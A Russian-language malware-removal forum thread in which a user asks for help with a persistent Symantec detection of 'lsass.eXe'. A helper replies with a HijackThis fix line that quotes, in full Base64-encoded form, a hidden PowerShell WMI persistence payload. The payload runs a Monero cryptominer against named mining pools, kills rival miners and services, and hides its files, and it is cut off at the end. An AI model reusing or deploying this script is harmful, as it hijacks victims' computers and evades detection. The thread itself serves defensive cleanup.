Здравствуйте.
Symantec постоянно отлавливает Trojan.Gen.2 lsass.eXe
Проверка другими антиивирусами ничего не находит.
Файлы исследования системы и скрин экрана антивируса во вложении.
Помогите, пожалуйста.
Printable View
Здравствуйте.
Symantec постоянно отлавливает Trojan.Gen.2 lsass.eXe
Проверка другими антиивирусами ничего не находит.
Файлы исследования системы и скрин экрана антивируса во вложении.
Помогите, пожалуйста.
Уважаемый(ая) [B]bayrak59[/B], спасибо за обращение на наш форум!
Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].
[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].
Запустите HijackThis, расположенный в папке Autologger и [url="http://virusinfo.info/showthread.php?t=4491"]пофиксите[/url] (в [B]Windows Vista/7/8/10[/B] необходимо запускать через правую кнопку мыши [B]Запуск от имени администратора)[/B]):[code]O25 - WMI Event: [PowerShell Event Log Consumer] PowerShell Event Log Filter - Event="__InstanceModificationEvent WITHIN 3600 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'", PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABGAGkAbABlACAAPQAgACIAJABFAG4AdgA6AFcAaQBuAEQAaQByAFwAVABlAG0AcABcAGwAcwBhAHMAcwAuAGUAWABlACIADQAKACQAQQByAGcAdgAgAD0AIAAiAC0AQgAgAC0AbwAgAHMAdAByAGEAdAB1AG0AKwB0AGMAcAA6AC8ALwBwAG8AbwBsAC4AbQBpAG4AZQB4AG0AcgAuAGMAbwBtADoAOAAwACAALQB1ACAANAA4ADMANgBKADcAMQA0AG8AUgBwAE0AOQB6AGQAdAA3AFAAWgBHAG0AcABDAGgAdQBmAHEAUwBFAEEARgBXADgAUgBnAEUATQBoAHUANAB0AHAARwBaAEsAaQBGAHQAbwBnAEEAaQBQAFkAOAA1AEcAVwA5AHQAVwBEADkAegBLAEUAaQA5AFgAbQBCADQAUAByAHcANQA1AE0ANQBmAGoAagBUAGcAcgBoAFYAaABTAEQATABMAGsARgBaACsAMgAwADAAMAAxACAALQBwACAAeAAgAC0AbwAgAHMAdAByAGEAdAB1AG0AKwB0AGMAcAA6AC8ALwBzAGcALgBtAGkAbgBlAHgAbQByAC4AYwBvAG0AOgA4ADAAIAAtAHUAIAA0ADgAMwA2AEoANwAxADQAbwBSAHAATQA5AHoAZAB0ADcAUABaAEcAbQBwAEMAaAB1AGYAcQBTAEUAQQBGAFcAOABSAGcARQBNAGgAdQA0AHQAcABHAFoASwBpAEYAdABvAGcAQQBpAFAAWQA4ADUARwBXADkAdABXAEQAOQB6AEsARQBpADkAWABtAEIANABQAHIAdwA1ADUATQA1AGYAagBqAFQAZwByAGgAVgBoAFMARABMAEwAawBGAFoAKwAyADAAMAAwADEAIAAtAHAAIAB4ACAALQBvACAAcwB0AHIAYQB0AHUAbQArAHQAYwBwADoALwAvAGMAYQAuAG0AaQBuAGUAeABtAHIALgBjAG8AbQA6ADgAMAAgAC0AdQAgADQAOAAzADYASgA3ADEANABvAFIAcABNADkAegBkAHQANwBQAFoARwBtAHAAQwBoAHUAZgBxAFMARQBBAEYAVwA4AFIAZwBFAE0AaAB1ADQAdABwAEcAWgBLAGkARgB0AG8AZwBBAGkAUABZADgANQBHAFcAOQB0AFcARAA5AHoASwBFAGkAOQBYAG0AQgA0AFAAcgB3ADUANQBNADUAZgBqAGoAVABnAHIAaABWAGgAUwBEAEwATABrAEYAWgArADIAMAAwADAAMQAgAC0AcAAgAHgAIAAtAG8AIABzAHQAcgBhAHQAdQBtACsAdABjAHAAOgAvAC8AZgByAC4AbQBpAG4AZQB4AG0AcgAuAGMAbwBtADoAOAAwACAALQB1ACAANAA4ADMANgBKADcAMQA0AG8AUgBwAE0AOQB6AGQAdAA3AFAAWgBHAG0AcABDAGgAdQBmAHEAUwBFAEEARgBXADgAUgBnAEUATQBoAHUANAB0AHAARwBaAEsAaQBGAHQAbwBnAEEAaQBQAFkAOAA1AEcAVwA5AHQAVwBEADkAegBLAEUAaQA5AFgAbQBCADQAUAByAHcANQA1AE0ANQBmAGoAagBUAGcAcgBoAFYAaABTAEQATABMAGsARgBaACsAMgAwADAAMAAxACAALQBwACAAeAAgAC0AbwAgAHMAdAByAGEAdAB1AG0AKwB0AGMAcAA6AC8ALwBkAGUALgBtAGkAbgBlAHgAbQByAC4AYwBvAG0AOgA4ADAAIAAtAHUAIAA0ADgAMwA2AEoANwAxADQAbwBSAHAATQA5AHoAZAB0ADcAUABaAEcAbQBwAEMAaAB1AGYAcQBTAEUAQQBGAFcAOABSAGcARQBNAGgAdQA0AHQAcABHAFoASwBpAEYAdABvAGcAQQBpAFAAWQA4ADUARwBXADkAdABXAEQAOQB6AEsARQBpADkAWABtAEIANABQAHIAdwA1ADUATQA1AGYAagBqAFQAZwByAGgAVgBoAFMARABMAEwAawBGAFoAKwAyADAAMAAwADEAIAAtAHAAIAB4ACAALQBvACAAcwB0AHIAYQB0AHUAbQArAHQAYwBwADoALwAvAHAAbwBvAGwALgBzAHUAcABwAG8AcgB0AHgAbQByAC4AYwBvAG0AOgA4ADAAIAAtAHUAIAA0ADgAMwA2AEoANwAxADQAbwBSAHAATQA5AHoAZAB0ADcAUABaAEcAbQBwAEMAaAB1AGYAcQBTAEUAQQBGAFcAOABSAGcARQBNAGgAdQA0AHQAcABHAFoASwBpAEYAdABvAGcAQQBpAFAAWQA4ADUARwBXADkAdABXAEQAOQB6AEsARQBpADkAWABtAEIANABQAHIAdwA1ADUATQA1AGYAagBqAFQAZwByAGgAVgBoAFMARABMAEwAawBGAFoAIAAtAHAAIAB4ACAALQBrACAALQAtAGQAbwBuAGEAdABlAC0AbABlAHYAZQBsAD0AMAAiAA0ACgAkAFcAbQBpAE4AYQBtAGUAIAA9ACAAIgByAG8AbwB0AFwAYwBpAG0AdgAyADoAUABvAHcAZQByAFMAaABlAGwAbABfAEMAbwBtAG0AYQBuAGQAIgANAAoAJABtAFAASQBkACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACQAVwBtAGkATgBhAG0AZQApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBQAEkAZAAnAF0ALgBWAGEAbAB1AGUADQAKACQAbgBQAEkAZAAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAkAFcAbQBpAE4AYQBtAGUAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAG4AUABJAGQAJwBdAC4AVgBhAGwAdQBlAA0ACgANAAoARgB1AG4AYwB0AGkAbwBuACAAQwByAGUAYQB0AGUATQBpAG4AZQByAA0ACgB7AA0ACgAJACQARABpAHIAIAA9ACAAIgAkAEUAbgB2ADoAVwBpAG4ARABpAHIAXABUAGUAbQBwACIADQAKAAkAaQBmACAAKAAhACgAVABlAHMAdAAtAFAAYQB0AGgAIAAkAEQAaQByACkAKQB7ACAATgBlAHcALQBJAHQAZQBtACAAJABEAGkAcgAgAC0AVAB5AHAAZQAgAEQAaQByAGUAYwB0AG8AcgB5ACAAfQANAAoACQBpAGYAIAAoACEAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQARgBpAGwAZQAgAC0ARgBvAHIAYwBlACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAIAAtAGkAcwAgAFsASQBPAC4ARgBpAGwAZQBJAG4AZgBvAF0AKQApACAAewAgAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgACQARgBpAGwAZQAgAC0ARgBvAHIAYwBlACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACAAfQANAAoADQAKAAkAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgACQARgBpAGwAZQApAA0ACgAJAHsADQAKAAkAfQANAAoACQBlAGwAcwBlAA0ACgAJAHsADQAKAAkACQBXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgBbAC0AXQAgAE0AaQBuAGUAcgAgAEYAaQBsAGUAIABpAHMAIABOAG8AdAAgAEUAeABpAHMAdABzACIADQAKAAkACQAkAE0AaQBuAGUAcgAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAFAAbwB3AGUAcgBTAGgAZQBsAGwAXwBDAG8AbQBtAGEAbgBkACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAEUAbgBNAGkAbgBlAHIAJwBdAC4AVgBhAGwAdQBlAA0ACgAJAAkAaQBmACAAKAAkAE0AaQBuAGUAcgAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwACkADQAKAAkACQB7AA0ACgAJAAkACQAkAEIAeQB0AGUAQQByAHIAYQB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAE0AaQBuAGUAcgApAA0ACgAJAAkACQBbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJABGAGkAbABlACwAIAAkAEIAeQB0AGUAQQByAHIAYQB5ACkADQAKAAkACQB9AA0ACgAJAH0ADQAKAA0ACgAJAGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAkAEYAaQBsAGUAKQANAAoACQB7AA0ACgAJAAkAJABPAFMAIAA9ACAAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8AQwBvAG0AcAB1AHQAZQByAFMAeQBzAHQAZQBtACkALgBTAHkAcwB0AGUAbQBUAHkAcABlAA0ACgAJAAkAJABTAE8AIAA9ACAAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8ATwBwAGUAcgBhAHQAaQBuAGcAUwB5AHMAdABlAG0AKQAuAE8AUwBBAHIAYwBoAGkAdABlAGMAdAB1AHIAZQANAAoACQAJAGkAZgAgACgAKAAkAE8AUwAgAC0ATQBhAHQAYwBoACAAJwA2ADQAJwApACAALQBPAHIAIAAoACQAUwBPACAALQBNAGEAdABjAGgAIAAnADYANAAnACkAKQANAAoACQAJAHsADQAKAAkACQAJACQAUAByAG8AYwBlAHMAcwAgAD0AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAEYAaQBsAGUAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuACAALQBQAGEAcwBzAFQAaAByAHUADQAKAAkACQB9AA0ACgAJAAkAZQBsAHMAZQANAAoACQAJAHsADQAKAAkACQAJACQAUAByAG8AYwBlAHMAcwAgAD0AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAEYAaQBsAGUAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJABBAHIAZwB2ACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AUABhAHMAcwBUAGgAcgB1AA0ACgAJAAkAfQANAAoACQAJACQAUAByAG8AYwBlAHMAcwBJAGQAIAA9ACAAJAAoACQAUAByAG8AYwBlAHMAcwAuAEkAZAApAA0ACgAJAAkAaQBmACAAKAAkAFAAcgBvAGMAZQBzAHMASQBkACAALQBuAGUAIAAkAE4AVQBMAEwAKQANAAoACQAJAHsADQAKAAkACQAJACQAVwBtAGkAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAATQBhAG4AYQBnAGUAbQBlAG4AdAAuAE0AYQBuAGEAZwBlAG0AZQBuAHQAQwBsAGEAcwBzACgAJABXAG0AaQBOAGEAbQBlACkADQAKAAkACQAJACQAVwBtAGkALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBtAFAASQBkACcALAAkAFAAcgBvAGMAZQBzAHMASQBkACkADQAKAAkACQAJACQATgB1AGwAbAA9ACQAVwBtAGkALgBQAHUAdAAoACkADQAKAA0ACgAJAAkACQBXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgBbACsAXQAgAE4AZQB3ACAAUAByAG8AYwBlAHMAcwAgAEkAZAAgAGkAcwAgACQAUAByAG8AYwBlAHMAcwBJAGQAIgANAAoACQAJAH0ADQAKAAkACQBlAGwAcwBlAA0ACgAJAAkAewANAAoACQAJAAkAVwByAGkAdABlAC0ASABvAHMAdAAgACIAWwAtAF0AIABOAGUAdwAgAFAAcgBvAGMAZQBzAHMAIABJAGQAIABpAHMAIABOAFUATABMACIADQAKAAkACQB9AA0ACgAJAH0ADQAKAH0ADQAKAA0ACgBGAHUAbgBjAHQAaQBvAG4AIABNAGEAaQBuAA0ACgB7AA0ACgAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiAFsAaQBdACAATwBsAGQAIABQAHIAbwBjAGUAcwBzACAASQBkACAAaQBzACAAJABtAFAASQBkAC8AJABuAFAASQBkACIADQAKAA0ACgAJAEsAaQBsAGwAZQByAA0ACgANAAoACQBpAGYAIAAoACgAJABtAFAASQBkACAALQBlAHEAIAAiACIAKQAgAC0ATwByACAAKAAkAG0AUABJAGQAIAAtAGUAcQAgACQATgB1AGwAbAApACAALQBPAHIAIAAoACgARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBJAGQAIAAkAG0AUABJAGQAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAKQAgAC0AZQBxACAAJABOAHUAbABsACkAKQANAAoACQB7AA0ACgAJAAkAIwAkAFQAZQBzAHQAIAA9ACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBQAGEAdABoACAALQBlAHEAIAAkAEYAaQBsAGUAfQANAAoACQAJACQAVABlAHMAdAAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBQAGEAdABoACAALQBlAHEAIAAkAEYAaQBsAGUAfQANAAoACQAJAGkAZgAgACgAJABUAGUAcwB0ACAALQBlAHEAIAAkAE4AdQBsAGwAKQANAAoACQAJAHsADQAKAAkACQAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiAFsALQBdACAATwBsAGQAIABQAHIAbwBjAGUAcwBzACAAaQBzACAATgBvAHQAIABFAHgAaQBzAHQAcwAiAA0ACgAJAAkACQBDAHIAZQBhAHQAZQBNAGkAbgBlAHIADQAKAAkACQB9AA0ACgAJAAkAZQBsAHMAZQANAAoACQAJAHsADQAKAAkACQAJACQAUAByAG8AYwBlAHMAcwBJAGQAIAA9ACAAJAAoACQAVABlAHMAdAAuAFAAcgBvAGMAZQBzAHMASQBkACkADQAKAA0ACgAJAAkACQAkAFcAbQBpAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACQAVwBtAGkATgBhAG0AZQApAA0ACgAJAAkACQAkAFcAbQBpAC4AUwBlAHQAUAByAG8AcABlAHIAdAB5AFYAYQBsAHUAZQAoACcAbQBQAEkAZAAnACwAJABQAHIAbwBjAGUAcwBzAEkAZAApAA0ACgAJAAkACQAkAE4AdQBsAGwAPQAkAFcAbQBpAC4AUAB1AHQAKAApAA0ACgANAAoACQAJAAkAVwByAGkAdABlAC0ASABvAHMAdAAgACIAWwArAF0AIABPAGwAZAAgAFAAcgBvAGMAZQBzAHMAIABpAHMAIABFAHgAaQBzAHQAcwAsACAAUAByAG8AYwBlAHMAcwAgAEkAZAAgAGkAcwAgACQAUAByAG8AYwBlAHMAcwBJAGQAIgANAAoACQAJAH0ADQAKAAkAfQANAAoACQBlAGwAcwBlAA0ACgAJAHsADQAKAAkACQBXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgBbACsAXQAgAE8AbABkACAAUAByAG8AYwBlAHMAcwAgAGkAcwAgAEUAeABpAHMAdABzACIADQAKAAkAfQANAAoAfQANAAoADQAKAEYAdQBuAGMAdABpAG8AbgAgAEsAaQBsAGwAZQByAA0ACgB7AA0ACgAJACQAUwByAHYATgBhAG0AZQAgAD0AIAAiAHgAVwBpAG4AVwBwAGQAUwByAHYAIgAsACIAbQBzAHMAZQBjAHMAdgBjADIALgAwACIALAAiAG0AcwBzAGUAYwBzAHYAYwAyAC4AMQAiACwAIgBEAGIAUwBlAGMAdQByAGkAdAB5AFMAcAB0ACIALAAgACIAUwBWAFMASABvAHMAdAAiACwAIgBNAGkAYwByAG8AcwBvAGYAdAAgAFQAZQBsAGUAbQBlAHQAcgB5ACIALAAiAGwAcwBhAHMAcwAiACwAIgBNAGkAYwByAG8AcwBvAGYAdAAiACwAIgBzAHkAcwB0AGUAbQAiACwAIgBPAHIAYQBjAGwAZQB1AHAAZABhAHQAZQAiACwAIgBDAEwAUgAiACwAIgBzAHkAcwBtAGcAdAAiACwAIgBcAGcAbQAiACwAIgBXAG0AZABuAFAAbgBTAE4AIgAsACAAIgBTAG8AdQBnAG8AdQBkAGwAIgAsACIATgBhAHQAaQBvAG4AYQBhAGEAbAAiACwAIgBOAGEAdABpAG0AbQBvAG4AYQBsACIALAAiAE4AYQB0AGkAbwBuAGEAbABvAGwAbAAiACwAIgBOAGEAdABpAG8AbgBhAGwAbQBsAGwAIgAsACAAIgBTAGEAbQBzAGUAcgB2AGUAcgAiACwAIgBSAHAAYwBFAHAAdABNAGEAbgBnAGUAcgAiACwAIgBOAGUAdABNAHMAbQBxAEEAYwB0AGkAdgAgAE0AZQBkAGkAYQAgAE4AVgBJAEQASQBBACIALAAiAFMAbgBjAHIAeQBwAHQAaQBvAG4AIABNAGUAZABpAGEAIABQAGwAYQB5AGUAcQAiACwAIgB3AGkAbgBkAG8AdwBzAC0AbgB2AGkAZABpAGEALQBmAGkAcgBlAHcAYQBsAGwAIgAsACIAWQBpAGwAdQB6AGgAdQBhAG4AcQBpAGEAbgBTAGUAcgAiACwAIgBzAHYAYwBoAG8AcwB0ACIADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJABTAHIAdgAgAGkAbgAgACQAUwByAHYATgBhAG0AZQApAA0ACgAJAHsADQAKACMACQAJAFMAZQB0AC0AUwBlAHIAdgBpAGMAZQAgAC0ATgBhAG0AZQAgACQAUwByAHYAIAAtAFMAdABhAHIAdAB1AHAAVAB5AHAAZQAgAEQAaQBzAGEAYgBsAGUAZAAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQANAAoAIwAJAAkAUwB0AG8AcAAtAFMAZQByAHYAaQBjAGUAIAAtAE4AYQBtAGUAIAAkAFMAcgB2ACAALQBGAG8AcgBjAGUAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUADQAKAAkACQAkAE4AdQBsAGwAIAA9ACAAUwBDAC4AZQB4AGUAIABDAG8AbgBmAGkAZwAgACQAUwByAHYAIABTAHQAYQByAHQAPQAgAEQAaQBzAGEAYgBsAGUAZAANAAoACQAJACQATgB1AGwAbAAgAD0AIABTAEMALgBlAHgAZQAgAFMAdABvAHAAIAAkAFMAcgB2AA0ACgAJAAkAJABOAHUAbABsACAAPQAgAFMAQwAuAGUAeABlACAARABlAGwAZQB0AGUAIAAkAFMAcgB2AA0ACgAJAH0ADQAKAA0ACgAJACQAVABhAHMAawBOAGEAbQBlACAAPQAgACIATQB5AHMAYQAiACwAIgBNAHkAcwBhADEAIgAsACIATQB5AHMAYQAyACIALAAiAE0AeQBzAGEAMwAiACwAIgBvAGsAIgAsACAAIgBPAHIAYQBjAGwAZQAgAEoAYQB2AGEAIgAsACIATwByAGEAYwBsAGUAIABKAGEAdgBhACAAVQBwAGQAYQB0AGUAIgAsACIATQBpAGMAcgBvAHMAbwBmAHQAIABUAGUAbABlAG0AZQB0AHIAeQAiACwAIgBTAHAAbwBvAGwAZQByACAAUwB1AGIAUwB5AHMAdABlAG0AIABTAGUAcgB2AGkAYwBlACIALAAiAE8AcgBhAGMAbABlACAAUAByAG8AZAB1AGMAdABzACAAUgBlAHAAbwByAHQAZQByACIALAAiAFUAcABkAGEAdABlACAAcwBlAHIAdgBpAGMAZQAgAGYAbwByACAAIABwAHIAbwBkAHUAYwB0AHMAIgAsACIAZwBtACIALAAiAG4AZwBtACIADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJABUAGEAcwBrACAAaQBuACAAJABUAGEAcwBrAE4AYQBtAGUAKQANAAoACQB7AA0ACgAJAAkAUwBjAGgAVABhAHMAawBzAC4AZQB4AGUAIAAvAEQAZQBsAGUAdABlACAALwBUAE4AIAAkAFQAYQBzAGsAIAAvAEYAIAAyAD4AIAAkAE4AdQBsAGwADQAKAAkAfQANAAoADQAKAAkAJABGAG8AbgB0AHMARABpAHIAIAA9ACAAIgAkAEUAbgB2ADoAVwBpAG4ARABpAHIAXABGAG8AbgB0AHMAXAAiAA0ACgAJACQAQwBtAGQATABpAG4AZQAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBDAG8AbQBtAGEAbgBkAEwAaQBuAGUAIAAtAGwAaQBrAGUAIAAnACoAYwByAHkAcAB0AG8AbgBpAGcAaAB0ACoAJwAgAC0ATwByACAAJABfAC4AQwBvAG0AbQBhAG4AZABMAGkAbgBlACAALQBsAGkAawBlACAAJwAqAHMAdAByAGEAdAB1AG0AKwAqACcAIAAtAE8AcgAgACQAXwAuAEMAbwBtAG0AYQBuAGQATABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgAtAC0AZABvAG4AYQB0AGUALQBsAGUAdgBlAGwAKgAnACAALQBPAHIAIAAkAF8ALgBDAG8AbQBtAGEAbgBkAEwAaQBuAGUAIAAtAGwAaQBrAGUAIAAnACoALQAtAG0AYQB4AC0AYwBwAHUALQB1AHMAYQBnAGUAKgAnACAALQBPAHIAIAAkAF8ALgBDAG8AbQBtAGEAbgBkAEwAaQBuAGUAIAAtAGwAaQBrAGUAIAAnACoALQBwACAAeAAqACcAIAAtAE8AcgAgACQAXwAuAEMAbwBtAG0AYQBuAGQATABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgBwAG8AbwBsAC4AZQBsAGUAYwB0AHIAbwBuAGUAdQBtAC4AaABhAHMAaAB2AGEAdQBsAHQALgBwAHIAbwAqACcAIAAtAE8AcgAgACQAXwAuAFAAYQB0AGgAIAAtAGwAaQBrAGUAIAAiACQARgBvAG4AdABzAEQAaQByACoAIgB9AA0ACgAJAGkAZgAgACgAJABDAG0AZABMAGkAbgBlACAALQBuAGUAIAAkAE4AdQBsAGwAKQANAAoACQB7AA0ACgAJAAkAJABQAGEAdABoAEEAcgByAGEAeQAgAD0AIABAACgAKQANAAoADQAKAAkACQBmAG8AcgBlAGEAYwBoACAAKAAkAG0AIABpAG4AIAAkAEMAbQBkAEwAaQBuAGUAKQANAAoACQAJAHsADQAKAAkACQAJACQAZQB2AGkAZAAgAD0AIAAkACgAJABtAC4AUAByAG8AYwBlAHMAcwBJAGQAKQANAAoACQAJAAkAaQBmACAAKAAoACQAZQB2AGkAZAAgAC0AZQBxACAAJABQAEkAZAApACAALQBvAHIAIAAoACQAZQB2AGkAZAAgAC0AZQBxACAAJABtAFAASQBkACkAKQAgAHsAIABjAG8AbgB0AGkAbgB1AGUAIAB9AA0ACgAJAAkACQBXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgBbAGkAXQAgAE0AaQBuAGUAcgAgAFAASQBkADoAIAAkAGUAdgBpAGQAIgANAAoACQAJAAkARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBJAGQAIAAkAGUAdgBpAGQAIAB8ACAAUwB0AG8AcAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAbwByAGMAZQANAAoADQAKAAkACQAJACQAUABhAHQAaAAgAD0AIAAkACgAJABtAC4AUABhAHQAaAApAA0ACgAJAAkACQBpAGYAIAAoACQAUABhAHQAaAAgAC0AZQBxACAAIgAkAEUAbgB2ADoAVwBpAG4ARABpAHIAXABTAHkAcwB0AGUAbQAzADIAXABjAG0AZAAuAGUAeABlACIAIAAtAE8AcgAgACQAUABhAHQAaAAgAC0AZQBxACAAIgAkAEUAbgB2ADoAVwBpAG4ARABpAHIAXABTAHkAcwBXAE8AVwA2ADQAXABjAG0AZAAuAGUAeABlACIAIAAtAE8AcgAgACQAUABhAHQAaAAgAC0AZQBxACAAIgAkAEUAbgB2ADoAVwBpAG4ARABpAHIAXABFAHgAcABsAG8AcgBlAHIALgBlAHgAZQAiACAALQBPAHIAIAAkAFAAYQB0AGgAIAAtAGUAcQAgACIAJABFAG4AdgA6AFcAaQBuAEQAaQByAFwATgBvAHQAZQBwAGEAZAAuAGUAeABlACIAIAAtAE8AcgAgACQAUABhAHQAaAAgAC0AZQBxACAAJABGAGkAbABlACkAIAB7ACAAYwBvAG4AdABpAG4AdQBlACAAfQANAAoADQAKAAkACQAJAGkAZgAgACgAJABQAGEAdABoAEEAcgByAGEAeQAgAC0ATgBvAHQAQwBvAG4AdABhAGkAbgBzACAAJABQAGEAdABoACkAIAB7ACAAJABQAGEAdABoAEEAcgByAGEAeQArAD0AJABQAGEAdABoACAAfQANAAoACQAJAH0ADQAKAA0ACgAJAAkAZgBvAHIAZQBhAGMAaAAgACgAJABQAGEAdABoACAAaQBuACAAJABQAGEAdABoAEEAcgByAGEAeQApAA0ACgAJAAkAewANAAoACQAJAAkAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAMwAwADsAIAAkAGkAKwArACkADQAKAAkACQAJAHsADQAKAAkACQAJAAkAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJABQAGEAdABoACAALQBGAG8AcgBjAGUAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUADQAKAAkACQAJAAkAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAUABhAHQAaAApAA0ACgAJAAkACQAJAHsADQAKAAkACQAJAAkACQBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAE0AaQBsAGwAaQBzAGUAYwBvAG4AZABzACAAMQAwADAADQAKAAkACQAJAAkAfQANAAoACQAJAAkACQBlAGwAcwBlAA0ACgAJAAkACQAJAHsADQAKAAkACQAJAAkACQAkAE4AdQBsAGwAIAA9ACAATgBlAHcALQBJAHQAZQBtACAAJABQAGEAdABoACAALQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUADQAKAAkACQAJAAkACQBpAGYAIAAoACQAPwApAA0ACgAJAAkACQAJAAkAewANAAoACQAJAAkACQAJAAkAJABmAGkAbABlACAAPQAgAEcAZQB0AC0ASQB0AGUAbQAgACQAUABhAHQAaAAgAC0ARgBvAHIAYwBlAA0ACgAJAAkACQAJAAkACQAkAGYAaQBsAGUALgBDAHIAZQBhAHQAaQBvAG4AVABpAG0AZQAgAD0AIAAnADEAMAAvADEAMAAvADIAMAAwADAAIAAxADAAOgAxADAAOgAxADAAJwANAAoACQAJAAkACQAJAAkAJABmAGkAbABlAC4ATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQAgAD0AIAAnADEAMAAvADEAMAAvADIAMAAwADAAIAAxADAAOgAxADAAOgAxADAAJwANAAoACQAJAAkACQAJAAkAJABmAGkAbABlAC4ATABhAHMAdABBAGMAYwBlAHMAcwBUAGkAbQBlACAAPQAgACcAMQAwAC8AMQAwAC8AMgAwADAAMAAgADEAMAA6ADEAMAA6ADEAMAAnAA0ACgAJAAkACQAJAAkACQAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACIAUgBlAGEAZABvAG4AbAB5ACIALAAiAFMAeQBzAHQAZQBtACIALAAiAEgAaQBkAGQAZQBuACIADQAKAAkACQAJAAkACQB9AA0ACgAJAAkACQAJAAkAYgByAGUAYQBrAA0ACgAJAAkACQAJAH0ADQAKAAkACQAJAH0ADQAKAAkACQB9AA0ACgAJAH0ADQAKAA0ACgAJAFsAYQByAHIAYQB5AF0AJABwAHMAaQBkAHMAIAA9ACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBOAGEAbQBlACAAUABvAHcAZQ